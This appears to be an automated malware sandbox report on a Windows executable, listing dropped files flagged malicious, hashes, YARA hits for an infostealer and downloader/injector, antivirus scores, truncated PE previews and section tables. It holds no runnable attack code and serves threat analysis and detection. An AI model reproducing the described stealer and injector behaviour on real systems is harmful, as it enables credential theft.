                                                                                                                                                                    SSDEEP:12288:teOvy9EFs6ned5sWKoBNI28L2OEB2iNhr/Y1+aeS62cJn1BtZWSnelf+qCxBEmYd:teOvy9fp1rrS68BfqoQhVG4+P5
                                                                                                                                                                    MD5:EAFEB784379E60C2D0BD8D46EAC05286
                                                                                                                                                                    SHA1:BDC3AD72052D2104F634DE81487514938F20293C
                                                                                                                                                                    SHA-256:77FB82033F9F2C89A74320C0705AF1FA6AB58236AA2DE2B9FFFF2CF5FFC98B2D
                                                                                                                                                                    SHA-512:64AF9C3A6F7A69BD3BEF8698E88C810133D86C17127872F6F714FF4DE12533B3952C1797A7D783A1370FF4F365732FE30C56B4B113DC2679A3146A4D2E2FFCFC
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_EternityStealer, Description: Yara detected Eternity Stealer, Source: C:\Users\user\AppData\Local\Temp\E35F.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\E35F.exe, Author: Joe Security
                                                                                                                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\E35F.exe, Author: ditekSHen
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...bc................0..x............... ........@.. ....................................@.................................P...K.................................................................................... ............... ..H............text....w... ...x.................. ..`.rsrc................z..............@....reloc..............................@..B........................H............?......1....2...N...........................................(....(....*:+.(X.*\.(....*.....*....{....*.....*....{....*.....*................}......}....*......*.......................8........E........U...6.......$...{.......8....8.... ....~~...9....& ....8.......;.... ....8....8{... ....~....:....& ....8....(.....{......{....o....:-... ....8d....u...... ....8R.....:.... ....8A...(.....{......{....o....*.*.*....*....................{....o....X )UU.Z(.....{....o..
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):6775808
                                                                                                                                                                    Entropy (8bit):7.987388970208731
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:196608:mpootpJcchlDhwyEjRA5n//JeVSR9xb1ROPQ0nnyJric:NotEcjDhwJRWnXoS/Bh0nkic
                                                                                                                                                                    MD5:9DC46160B805B73634F4BD8507F11494
                                                                                                                                                                    SHA1:BD5104406E8C29537B77C428C8707A40A6E118EF
                                                                                                                                                                    SHA-256:94DF05071CAD9595820A5132137D060B0D2D3CD122E5CAD35A014D80A6BDE02A
                                                                                                                                                                    SHA-512:9F6DEFBC6029E125F42568640BD9E5B52CE5985B96532D020169542E6B9498A9F5900D868D17E3B1D903682975070DDFA844FA383DAFB8A9B023AC1B331213A3
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\FD8E.exe, Author: ditekSHen
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 96%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................Zg.........>xg.. ....g...@.. ........................g...........@..................................wg.K.....g.H.....................g...................................................... ............... ..H............text...DXg.. ...Zg................. ..`.rsrc...H.....g......\g.............@..@.reloc........g......bg.............@..B................ xg.....H.......,bg..............'...:g..........................................0.._.......~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.(....,..(....~....,.~.... ....Z(....~....,.r...pr...p.(....&..8....~.....o.....~.....o.....~.....o.....~.....o.......(......~....,...(......~....r...p(....,.(....r...po......(......+)~....r1..p(....,...(....r...po....(..........(....(..........(.......(......X..~....o....?....~....&*..0../........s.....s.......s.......o.......,
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\FD8E.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):2467259
                                                                                                                                                                    Entropy (8bit):7.923798296730071
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:49152:v12s5FXQ4EmojLjCRELVf7Avil+dHIsLp1thIikN+6u2hsX:vjzX71oDCRAZUviAHImDqia7hsX
                                                                                                                                                                    MD5:5FF80C42809C1A7DA41A5E8712FCBBAF
                                                                                                                                                                    SHA1:A73380553B714A05E855CEB60F366FFDB328519D
                                                                                                                                                                    SHA-256:69A94B658BCE41D361945A1594FDC801209D8719AE67DF8D2D3DF5056E9B0537
                                                                                                                                                                    SHA-512:A7A99D638487B65C028245403040B18B848D8A955A33E1FBCE653FF3A87351A3E3812622ADD5CA6E2C1F2DDC7894E47E20895CBFAF70E577E44CED7F8CCABC8B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 91%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P...#...........................................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....#...P...$..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\9D1E.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):760320
                                                                                                                                                                    Entropy (8bit):6.561572491684602
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:wCMz4nuvURpZ4jR1b2Ag+dQMWCD8iN2+OeO+OeNhBBhhBBgoo+A1AW8JwkaCZ+36:wCs4uvW4jfb2K90oo+C8JwUZc0
                                                                                                                                                                    MD5:544CD51A596619B78E9B54B70088307D
                                                                                                                                                                    SHA1:4769DDD2DBC1DC44B758964ED0BD231B85880B65
                                                                                                                                                                    SHA-256:DFCE2D4D06DE6452998B3C5B2DC33EAA6DB2BD37810D04E3D02DC931887CFDDD
                                                                                                                                                                    SHA-512:F56D8B81022BB132D40AA78596DA39B5C212D13B84B5C7D2C576BBF403924F1D22E750DE3B09D1BE30AEA359F1B72C5043B19685FC9BF06D8040BFEE16B17719
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v...2...2...2...]...6....f..0...)=..,...)=....;...;...2.~.C...)=..i...)=......)=..3...)=..3...Rich2...........PE..L....#da...........!.....(...n...............@......................................(.....@.............................C.......x................................n...B..................................@............@...............................text....&.......(.................. ..`.rdata......@.......,..............@..@.data...`...........................@....rsrc...............................@..@.reloc..R...........................@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1600.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):704512
                                                                                                                                                                    Entropy (8bit):6.496956945559699
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:ERObekMSkfohrPUs37uzHnA6zg5cIsalHERjUrNN/RQ9wgUT5EDExyc:2ObekrkfohrP337uzHnA6cHswHE/6gU3
                                                                                                                                                                    MD5:A7662827ECAEB4FC68334F6B8791B917
                                                                                                                                                                    SHA1:F93151DD228D680AA2910280E51F0A84D0CAD105
                                                                                                                                                                    SHA-256:05F159722D6905719D2D6F340981A293F40AB8A0D2D4A282C948066809D4AF6D
                                                                                                                                                                    SHA-512:E9880B3F3EC9201E59114850E9C570D0AD6D3B0E04C60929A03CF983C62C505FCB6BB9DC3ADEEE88C78D43BD484159626B4A2F000A34B8883164C263F21E6F4A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................|...................idata...%.......&...|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1600.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):704512
                                                                                                                                                                    Entropy (8bit):6.496956945559699
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:ERObekMSkfohrPUs37uzHnA6zg5cIsalHERjUrNN/RQ9wgUT5EDExyc:2ObekrkfohrP337uzHnA6cHswHE/6gU3
                                                                                                                                                                    MD5:A7662827ECAEB4FC68334F6B8791B917
                                                                                                                                                                    SHA1:F93151DD228D680AA2910280E51F0A84D0CAD105
                                                                                                                                                                    SHA-256:05F159722D6905719D2D6F340981A293F40AB8A0D2D4A282C948066809D4AF6D
                                                                                                                                                                    SHA-512:E9880B3F3EC9201E59114850E9C570D0AD6D3B0E04C60929A03CF983C62C505FCB6BB9DC3ADEEE88C78D43BD484159626B4A2F000A34B8883164C263F21E6F4A
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........q............@..............................................@...............................%..................................................................................................................CODE....(d.......f.................. ..`DATA.................j..............@...BSS..................|...................idata...%.......&...|..............@....tls.....................................rdata..............................@..P.reloc.............................@..P.rsrc...............................@..P.....................J..............@..P........................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):308224
                                                                                                                                                                    Entropy (8bit):6.443268319950933
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3072:p8lLyOIPrkS7rJikDHwpd/v20EghCl3nXqod2AkaR/Q9oAfTK7KVDrc+B5f239+A:p8lL2DkSidH2T2wXUUsfTgYn79o6q
                                                                                                                                                                    MD5:1B92D73AC6CA807ADC303C424EEEB80B
                                                                                                                                                                    SHA1:836E751F86AB603920A22F1778FFC56D3D52A9AC
                                                                                                                                                                    SHA-256:D7567C94D64FC05B847558D0308B54DF1A716FCBE45A480ADE6F2987A5EBBAEF
                                                                                                                                                                    SHA-512:0723CDABF20B65157093CEA017CF37A23D1986EE1B071872FD1318B91EE0E5DF0ADB3B09D2F47A5A9AD4E9E5FD05A8ED13679B485053E4FC323A9312C9FB2C63
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 46%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(8e.lY..lY..lY..r...}Y..r...>Y..r...HY..K.p.kY..lY...Y..r...mY..r...mY..r...mY..RichlY..........PE..L...@0Hc.................b...z......#"............@.......................... ..................................................P........}..................................................H........................................................text....`.......b.................. ..`.rdata...@.......B...f..............@..@.data...|...........................@....tls.........p......................@....dag.................0..............@....muce...A............2..............@....rsrc....}.......~...6..............@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):26
                                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:modified
                                                                                                                                                                    Size (bytes):308736
                                                                                                                                                                    Entropy (8bit):6.446359605030636
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:6144:u8lLhDkSuupj2pETuETIm61NfTgYn79o6q:u+WSuup0EzbCn7a
                                                                                                                                                                    MD5:0E219D95AC454729366F376B54D9CFB4
                                                                                                                                                                    SHA1:18D0669758DF7344248BDE48827EAA0AB6B0420D
                                                                                                                                                                    SHA-256:BA134E62CF135A967C9C08BC04D3568B3A11A8933D299ADA80506855B6680D5C
                                                                                                                                                                    SHA-512:77DA1BA45B636C8617B68E5B20B9E3F87A407CECEFFD395AA989DF8B2FF67BDE07F41FEEF61967F4C9B324A8E31D12A702E6968028B627500744ECBC35193EDD
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 41%
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(8e.lY..lY..lY..r...}Y..r...>Y..r...HY..K.p.kY..lY...Y..r...mY..r...mY..r...mY..RichlY..........PE..L....6.d.................d...z......#"............@.......................... .......`..........................................P........}..................................................H........................................................text....b.......d.................. ..`.rdata...@.......B...h..............@..@.data...|...........................@....tls.........p.......0..............@....fidox...............2..............@....zope...A............4..............@....rsrc....}.......~...8..............@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):55
                                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Entropy (8bit):6.443268319950933
                                                                                                                                                                    TrID:
                                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                    File name:987123.exe
                                                                                                                                                                    File size:308'224 bytes
                                                                                                                                                                    MD5:1b92d73ac6ca807adc303c424eeeb80b
                                                                                                                                                                    SHA1:836e751f86ab603920a22f1778ffc56d3d52a9ac
                                                                                                                                                                    SHA256:d7567c94d64fc05b847558d0308b54df1a716fcbe45a480ade6f2987a5ebbaef
                                                                                                                                                                    SHA512:0723cdabf20b65157093cea017cf37a23d1986ee1b071872fd1318b91ee0e5df0adb3b09d2f47a5a9ad4e9e5fd05a8ed13679b485053e4fc323a9312c9fb2c63
                                                                                                                                                                    SSDEEP:3072:p8lLyOIPrkS7rJikDHwpd/v20EghCl3nXqod2AkaR/Q9oAfTK7KVDrc+B5f239+A:p8lL2DkSidH2T2wXUUsfTgYn79o6q
                                                                                                                                                                    TLSH:3B648D1135E5C133E2B31BB8887487B01B3F78627975455E2A8B1B6D1F2B7D18A313AB
                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(8e.lY..lY..lY..r...}Y..r...>Y..r...HY..K.p.kY..lY...Y..r...mY..r...mY..r...mY..RichlY..........PE..L...@0Hc.................b.
                                                                                                                                                                    Icon Hash:0b3164646d311f46
                                                                                                                                                                    Entrypoint:0x402223
                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                    Digitally signed:false
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                    Time Stamp:0x63483040 [Thu Oct 13 15:35:28 2022 UTC]
                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                    OS Version Major:5
                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                    File Version Major:5
                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                    Subsystem Version Major:5
                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                    Import Hash:de13e22fc261029836773306583464cf
                                                                                                                                                                    Instruction
                                                                                                                                                                    call 00007F31D5344A40h
                                                                                                                                                                    jmp 00007F31D53405AEh
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    int3
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    test ecx, 00000003h
                                                                                                                                                                    je 00007F31D5340756h
                                                                                                                                                                    mov al, byte ptr [ecx]
                                                                                                                                                                    add ecx, 01h
                                                                                                                                                                    test al, al
                                                                                                                                                                    je 00007F31D5340780h
                                                                                                                                                                    test ecx, 00000003h
                                                                                                                                                                    jne 00007F31D5340721h
                                                                                                                                                                    add eax, 00000000h
                                                                                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                    lea esp, dword ptr [esp+00000000h]
                                                                                                                                                                    mov eax, dword ptr [ecx]
                                                                                                                                                                    mov edx, 7EFEFEFFh
                                                                                                                                                                    add edx, eax
                                                                                                                                                                    xor eax, FFFFFFFFh
                                                                                                                                                                    xor eax, edx
                                                                                                                                                                    add ecx, 04h
                                                                                                                                                                    test eax, 81010100h
                                                                                                                                                                    je 00007F31D534071Ah
                                                                                                                                                                    mov eax, dword ptr [ecx-04h]
                                                                                                                                                                    test al, al
                                                                                                                                                                    je 00007F31D5340764h
                                                                                                                                                                    test ah, ah
                                                                                                                                                                    je 00007F31D5340756h
                                                                                                                                                                    test eax, 00FF0000h
                                                                                                                                                                    je 00007F31D5340745h
                                                                                                                                                                    test eax, FF000000h
                                                                                                                                                                    je 00007F31D5340734h
                                                                                                                                                                    jmp 00007F31D53406FFh
                                                                                                                                                                    lea eax, dword ptr [ecx-01h]
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                    ret
                                                                                                                                                                    lea eax, dword ptr [ecx-02h]
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                    ret
                                                                                                                                                                    lea eax, dword ptr [ecx-03h]
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                    ret
                                                                                                                                                                    lea eax, dword ptr [ecx-04h]
                                                                                                                                                                    mov ecx, dword ptr [esp+04h]
                                                                                                                                                                    sub eax, ecx
                                                                                                                                                                    ret
                                                                                                                                                                    mov edi, edi
                                                                                                                                                                    push ebp
                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                    sub esp, 20h
                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                    push esi
                                                                                                                                                                    push edi
                                                                                                                                                                    push 00000008h
                                                                                                                                                                    pop ecx
                                                                                                                                                                    mov esi, 004282A8h
                                                                                                                                                                    lea edi, dword ptr [ebp-20h]
                                                                                                                                                                    rep movsd
                                                                                                                                                                    mov dword ptr [ebp-08h], eax
                                                                                                                                                                    mov eax, dword ptr [ebp+0Ch]
                                                                                                                                                                    pop edi
                                                                                                                                                                    mov dword ptr [ebp-04h], eax
                                                                                                                                                                    pop esi
                                                                                                                                                                    test eax, eax
                                                                                                                                                                    je 00007F31D534073Eh
                                                                                                                                                                    test byte ptr [eax], 00000008h
                                                                                                                                                                    je 00007F31D5340739h
                                                                                                                                                                    mov dword ptr [ebp+00h], 00000000h
                                                                                                                                                                    Programming Language:
                                                                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                                                                    • [ C ] VS2008 build 21022
                                                                                                                                                                    • [C++] VS2008 build 21022
                                                                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                                                                    • [LNK] VS2008 build 21022
                                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x2b6fc0x50.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3a0000x17db8.rsrc
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x2aa480x18.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x280000x1a8.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000x260da0x26200False0.7097592213114754data7.3353810606741625IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rdata0x280000x40da0x4200False0.3787878787878788data5.3382770469329195IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x2d0000x977c0x8600False0.03329057835820896data0.4426692591450232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .tls0x370000x1a10x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .dag0x380000xc0x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .muce0x390000x2410x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rsrc0x3a0000x17db80x17e00False0.5740449116492147data5.945417431952457IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    RT_CURSOR0x4e1e00x134Targa image data - Map - RLE 64 x 65536 x 1 +32 "\001"SetsuanaSouth Africa0.75
                                                                                                                                                                    RT_ICON0x3a9000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa0.7922138836772983
                                                                                                                                                                    RT_ICON0x3b9c00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa0.4533582089552239
                                                                                                                                                                    RT_ICON0x3c8680x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa0.6001805054151624
                                                                                                                                                                    RT_ICON0x3d1100x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SetsuanaSouth Africa0.6797235023041475
                                                                                                                                                                    RT_ICON0x3d7d80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa0.7586705202312138
                                                                                                                                                                    RT_ICON0x3dd400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa0.5910788381742739
                                                                                                                                                                    RT_ICON0x402e80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SetsuanaSouth Africa0.6446998123827392
                                                                                                                                                                    RT_ICON0x413900x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa0.7397540983606558
                                                                                                                                                                    RT_ICON0x41d180x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa0.7943262411347518
                                                                                                                                                                    RT_ICON0x421f80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SetsuanaSouth Africa0.46828358208955223
                                                                                                                                                                    RT_ICON0x430a00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SetsuanaSouth Africa0.6376353790613718
                                                                                                                                                                    RT_ICON0x439480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SetsuanaSouth Africa0.7171658986175116
                                                                                                                                                                    RT_ICON0x440100x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SetsuanaSouth Africa0.7745664739884393
                                                                                                                                                                    RT_ICON0x445780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SetsuanaSouth Africa0.6446058091286307
                                                                                                                                                                    RT_ICON0x46b200x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SetsuanaSouth Africa0.7569672131147541
                                                                                                                                                                    RT_ICON0x474a80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SetsuanaSouth Africa0.8404255319148937
                                                                                                                                                                    RT_ICON0x479780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSetsuanaSouth Africa0.44349680170575695
                                                                                                                                                                    RT_ICON0x488200x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSetsuanaSouth Africa0.5595667870036101
                                                                                                                                                                    RT_ICON0x490c80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSetsuanaSouth Africa0.5944700460829493
                                                                                                                                                                    RT_ICON0x497900x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSetsuanaSouth Africa0.6416184971098265
                                                                                                                                                                    RT_ICON0x49cf80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600SetsuanaSouth Africa0.5231327800829876
                                                                                                                                                                    RT_ICON0x4c2a00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224SetsuanaSouth Africa0.5931050656660413
                                                                                                                                                                    RT_ICON0x4d3480x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400SetsuanaSouth Africa0.6122950819672132
                                                                                                                                                                    RT_ICON0x4dcd00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088SetsuanaSouth Africa0.6684397163120568
                                                                                                                                                                    RT_STRING0x4e5100x29edataSetsuanaSouth Africa0.49701492537313435
                                                                                                                                                                    RT_STRING0x4e7b00x630dataSetsuanaSouth Africa0.4311868686868687
                                                                                                                                                                    RT_STRING0x4ede00x7b8dataSetsuanaSouth Africa0.4215587044534413
                                                                                                                                                                    RT_STRING0x4f5980x724dataSetsuanaSouth Africa0.43052516411378555
                                                                                                                                                                    RT_STRING0x4fcc00x734dataSetsuanaSouth Africa0.41323210412147504
                                                                                                                                                                    RT_STRING0x503f80xe6dataSetsuanaSouth Africa0.5521739130434783
                                                                                                                                                                    RT_STRING0x504e00x4eedataSetsuanaSouth Africa0.4469096671949287
                                                                                                                                                                    RT_STRING0x509d00x100dataSetsuanaSouth Africa0.55078125
                                                                                                                                                                    RT_STRING0x50ad00x7f8dataSetsuanaSouth Africa0.4161764705882353
                                                                                                                                                                    RT_STRING0x512c80x5eedataSetsuanaSouth Africa0.4440052700922266
